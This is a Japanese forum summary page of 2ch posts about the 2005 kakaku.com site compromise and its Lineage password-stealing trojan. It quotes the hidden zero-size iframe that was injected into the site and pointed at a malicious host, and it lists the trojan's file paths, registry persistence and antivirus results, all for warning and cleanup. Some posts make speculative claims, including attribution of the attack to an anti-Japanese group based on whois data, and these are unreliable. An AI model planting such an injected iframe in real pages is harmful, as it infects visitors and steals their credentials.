Powerd by 2ちゃんねる
※本暫定まとめサイトは2ちゃんねるにおけるコピペを主体として作成されています。信頼性の一切を保証しません。
■「真理です。」スパム
65 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/19(木) 09:17:19
ところで俺のところには5月4日に登録メールアドレス宛に「真理です。」メールが来てるんだが、
これって改竄が発覚した11日よりも1週間も前に情報が漏れていたということなんだろうか。
66 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/19(木) 09:36:52
>>65
静岡新聞関連
>同社の情報によれば,同サイトへの不正アクセスが5月5日までに発生したことを
>同社では確認している。その際,ウイルスに感染させるようなプログラム(コード)が
>「新卒のかんづめ」のトップページに埋め込まれていた。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050518/161026/
Kasperskyの定義ファイルによる対応(Trojan-PSW.Win32.Delf.fz)が対応が5日。
トロイの木馬については、下のページを訪れたNOD32ユーザがNOD32のアドバンスド
ヒューリスティックを有効にしていれば、5月5日以前から感染可能な状態にあった
場合、ウイルス警告が出るだろうけど、価格コム専用メールアドレスにスパムメールが
届くというのは先月くらいに価格コムのインターネット掲示板かどこかに書き込みが
あったと思ったので、一部メールアドレスの漏洩に関しては、改竄とは別に、
もっと前からあった可能性も考えられます。
http://www.kakaku.com/report/report050518.html
573 名前:名無しさん@5周年[] 投稿日:2005/05/19(木) 10:46:26 ID:UeY4LtmL
「真理です。」スパム、4月25日から来るようになったんですけど。
価格.comにしか登録したこと無いメアドなので確実と思われ。
他にも「★無料登録で豪華プレゼントが当たる★」や
「本日会える女性の担当をお願いします。」、「時間少しいいですか?」など。
4月25日から、メアド抹消する5月3日までにいろいろ織り交ぜて計21通。
■リネージュアカウントハック
930 名前:名も無き冒険者[sage] 投稿日:2005/05/19(木) 08:13:58 ID:gkvDO5Sj
>>859
855じゃないけど、アカハックは全鯖で連日おこなわれてます。
6鯖全部にキャラがいて、クラン(それなりの規模)にも入ってますが
ここ1ヶ月だけで、友達2人、クラン員(各鯖一人以上・・)9人
知り合い15人が垢ハックされています・・・。
はっきりいって、この数字は異常です。 冗談抜きでリネ潰れるかもしれません。
NCJはいまごろリネウィルス情報を出したりしてますが、すでに手遅れです。
いままで何度もメールしてきたのに、見当違いのテンプレ回答しか返さず
その対処を伸ばし伸ばしにしてきたNCJに、腹が立つ思いでいっぱいです。
今回の垢ハックは、大掛かりな犯罪であり、RMTという土壌と結びつく事で
被害額は、総額にして数千万円にも達します(被害者は数百人にも及んでいます)
その実情が明らかになれば、確実に今回の事件は不起訴にはおわらないでしょう。
そして、裁判の結果がどうであれ、NCJの経営責任が問われる事は確実です。
ユーザーの安全と権利を守れず、個人情報を露出させ、リネウィルスへの対応を怠り
RMT業者に対する対応も怠り、その結果、悪質な犯罪を発生させてしまったNCJ・・・ま、長くはないでしょうw
931 名前:名も無き冒険者[sage] 投稿日:2005/05/19(木) 08:16:07 ID:KYo7Jkrr
マスコミにたれこもうぜ
932 名前:名も無き冒険者[] 投稿日:2005/05/19(木) 08:32:49 ID:DfvFzpoW
垢ハックと騒いでるが
実際に数百人もハックされてない
数十人の間違い
933 名前:名も無き冒険者[sage] 投稿日:2005/05/19(木) 08:41:23 ID:QV1CodVc
>>932
瞬間同時ハック数がでしょうか?w
■反日?
255 名前:名無しさん@5周年[] 投稿日:2005/05/16(月) 12:57:16 ID:+VguF0Vj
犯人は中国(おそらく北京)の反日組織です。証拠を発見しました。
スクリプトの拡張子が普通じゃないのに注目して、"count/counter.ap?id="をググってみると、
ttp://www.google.com/search?q=%22count%2Fcounter.ap%3Fid%3D%22
j4sb.com以外に shtm1.com と 0x61.com が同じスクリプトを走らせていることが分かります。
whoisでこれらのサイト情報を検索すると
ttp://whois.ansi.co.jp/?key=shtm1.com
ttp://whois.ansi.co.jp/?key=0x61.com
Admin Name........... pi ger
Admin Address........ hidden
Admin Address........
Admin Address........ Beijing
Admin Address........ 123456
Admin Address........ BJ
Admin Address........ CN
Admin Email.......... fuckjpmm@china.com
Admin Phone.......... +86.1012345678
Admin Fax............ +86.1012345678
と出てきます。 fuckjpmm とは "Fuck Japanese!"
どう見ても反日です。
警察に通報して、外交問題にしてください。
まとめサイトの方、よろしく。
■価格.comのキャッシュ
815 名前:名無しさん@5周年[sage] 投稿日:2005/05/16(月) 06:12:29 ID:0h8NcUwU
http://news19.2ch.net/test/read.cgi/newsplus/1116182083/
kakaku.comのページがクラックされてトロイが仕込まれていた件だが、こんな書き込みを発見。
心当たりの向きは注意されたし。
574 名前: おかいものさん [sage] 投稿日: 2005/05/14(土) 22:25:09
まず、下記のリンクからIntelligent Updaterを使って最新のウイルス定義ファイルに更新しろ。
LiveUpdateの物ではだめだからな。
http://www.symantec.co.jp/region/jp/sarcj/defs.download.html
<br>
価格.COMのグーグルキャッシュ(メンテ前のもの)でソースを見てみると
<iframe src=http://www.j4sb.com/count/counter.ap?id=a02 width=0 height=0></iframe>
という行がある。
で、ttp://www.j4sb.com/count/counter.ap?id=a02にアクセスしに行くと、
PWSteal.Lineageってトロイの木馬が検出される。
(WindowsUpdateをちゃんとしているWindowsなら大丈夫みたい。)
217 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/16(月) 12:23:46
【kakaku.com】カカク・ドット・コム【価格.com】
http://money3.2ch.net/test/read.cgi/shop/1096906296/574
の書き込みをしたものだが、
norton+Intelligent Updaterでの検出結果
C:\WINNT\system32\htdll.dll
C:\WINNT\Downloaded Program Files\#.exe
c:\winnt\system32\explorer.exe
この3つのファイルと、IEのキャッシュがPWSteal.Lineageとして検出された。
explorer.exeはサイズが200KB ぐらいで、アイコンがNotepadのもの。
レジストリでは
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
にc:\winnt\system32\explorer.exeが追加されていた。
で、正常なexplorer.exeが起動せずに、デスクトップが壁紙だけになった。
職場のPCが感染したんだが、Symanecに怪しいファイルを提出したり、復旧作業やらで大変だったよ
196 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/17(火) 09:26:45
http://www.itmedia.co.jp/enterprise/articles/0407/06/news072.html
記事の日付からもわかるけど、現状では検証した結果、
SP2などではもっと根本的な解決をしている
今回の件の参考までにどうぞ!
■WindowsUpdate197 名前:8[sage] 投稿日:2005/05/17(火) 09:27:28
みなさんおはようございます。
本日は3時間の睡眠でした。きっつぅ・・・。
起きてからノートンサンのところ見たらウイルスの説明に
>悪質な URL がクリックされると、デフォルトブラウザが j4sb.com ドメインの Web ページを表示します。
HTML の Web ページは Microsoft Internet Explorer ITS プロトコルゾーンバイパスの脆弱性 (BID 9658)
を悪用しようと試みることで、同じサイトにある .CHM ファイルを実行します。
って書いてました。っで、「Microsoft Internet Explorer ITS プロトコルゾーンバイパスの脆弱性 (BID 9658)」
とやらを調べてみたらどうやらMS040-013で適用済みみたいです。
よって今回の騒動はMS040-013を適用できてない人がかかってるみたいですね。
WindowsUpdateを毎回しててウイルススキャンして発見される人はIEキャッシュに反応してるジャマイカ??思われます。
202 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/17(火) 09:32:54
>よって今回の騒動はMS040-013を適用できてない人がかかってるみたいですね。
なるほどなあ。
アンチウイルスに頼りすぎて、Windowsアップデートを適用していないのも考えもんだね。
カカクの対応は論外だけどなw
■ウイルスバスター695 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/17(火) 23:47:20
>>692
バスター呪われてな。最近の状況見ると。
CPU100%の次は、顧客企業のkakaku.comがハッキングだろ。
もう、セキュリティ企業として致命的すぎるだろ。
あげくに、その顧客にNOD32を勧められた日には、目も当てられない。
実際、NOD32ユーザーからのクレームで気づいたそうだけど、
あまりにもお粗末。
今のところ、NOD32の販促活動にしかなってない。
■カカクコムに電話した方の御報告
俺「NOD32のサイトが落ちて状況がわかりません、どのような状態が出ますか?」
価「只今判明していることは、なんだかの亜種と言うことです。」
俺「お取り先の情報もあるので、早急に対処したいのですが、どの様にすればいいですか?」
価「各方面と対処の方法検討しておりますが、弊社としてはまだ何も申し上げられません。
解り次第早急にアナウンスいたします。」
もう少し話したが、手詰まりと言った反応しか返ってこなかった。
【セキュリティ板情報】
695 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/05/16(月) 17:12:59
shtml.com重すぎ。やっと全部終わった。 0x61.comは404だったのでパス。
j4sb.comと微妙に違うやつだけどこっちも検出率悪いな。
結果は全部同じ結果で下の通りでつ。
NOD32かBitDefenderが入ってるなら安心してもよさそう。
Antivirus Version Update Result
AntiVir 6.30.0.12 05.13.2005 no virus found
AVG 718 05.13.2005 no virus found
Avira 6.30.0.12 05.13.2005 no virus found
BitDefender 7.0 05.16.2005 Dropped:Trojan.PWS.Lineage.CI
ClamAV devel-20050501 05.15.2005 no virus found
DrWeb 4.32b 05.16.2005 no virus found
eTrust-Iris 7.1.194.0 05.15.2005 no virus found
eTrust-Vet 11.9.1.0 05.16.2005 no virus found
Fortinet 2.51 05.15.2005 no virus found
Ikarus 2.32 05.15.2005 no virus found
Kaspersky 4.0.2.24 05.16.2005 no virus found
McAfee 4491 05.13.2005 no virus found
NOD32v2 1.1097 05.15.2005 Win32/TrojanDownloader.Small.AAO
Norman 5.70.10 05.13.2005 no virus found
Panda 8.02.00 05.15.2005 no virus found
Sybari 7.5.1314 05.16.2005 no virus found
Symantec 8.0 05.15.2005 no virus found
VBA32 3.10.3 05.16.2005 no virus foun
194 名前:名無しさん@5周年[sage] 投稿日:2005/05/17(火) 05:25:02 ID:oHhFKyHY
2ちゃんのまとめサイトって>>185みたいに情報をダラダラ並べまくるの多いね。
ホンッと使えねーな。
201 名前:名無しさん@5周年[sage] 投稿日:2005/05/17(火) 05:37:24 ID:wYfQMOWJ
>>194 事態の全容をザッと見渡せるようなINDEX作りが下手だよね 手元にあるテキストを並べるだけで、まとめ心に欠ける
784 名前:おかいものさん[sage] 投稿日:2005/05/16(月) 20:10:31
ブラウザ: Firefox
メーラー: EdMax
オフィス: TeX
スパイウェア対策: Spybot, Spywareblaster, Adaware, IE-SPYAD
ウィルス対策: avast!, MicroWorld FREE AntiVirus Toolkit Utility
トロイ対策: Ewido, a scuared
ファイアウォール: Kerio4
フィルタ: proxomitron, peerguardian, NEGiES
砂箱: SSM
串: Freecap, Tor
プライバシー消去: IE_Privacy_Keeper
どれもタダ。全部入れとけ。